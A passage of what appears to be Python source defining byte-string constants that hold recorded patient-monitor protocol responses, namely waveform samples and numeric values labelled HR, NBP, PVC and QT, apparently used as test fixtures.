b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ 
b"\x20\x5f\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0a\xbd\x0a\xf3\x0b\x25\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd" \ b"\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5" \ b"\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0" \ b"\x0a\x9d\x0a\x68\x0a\x31\x09\xf9\x09\xbf\x09\x85\x09\x4b\x09\x10" \ b"\x08\xd7" rsp_wave_4_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x18\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x33\x20\x30" \ 
b"\x20\x30\x20\x2d\x20\x2a\x20\x28\x20\x26\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x77\x20\x75" \ b"\x20\x6d\x20\x67\x20\x61\x20\x59\x20\x51\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ 
b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_nu_5_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ 
b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ 
b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_5_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ 
b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ 
b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_5_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_5_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x01\x2e\x00\x04\x00\x07\x01\x28\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x01\x1e\x00\x03\x00\x00\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x01\x04\x00\x00\x00\x02" \ b"\x00\xfe\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40" \ b"\x06\x1f\x06\x1d\x06\x1a\x06\x15\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_5_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x08\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ 
b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ 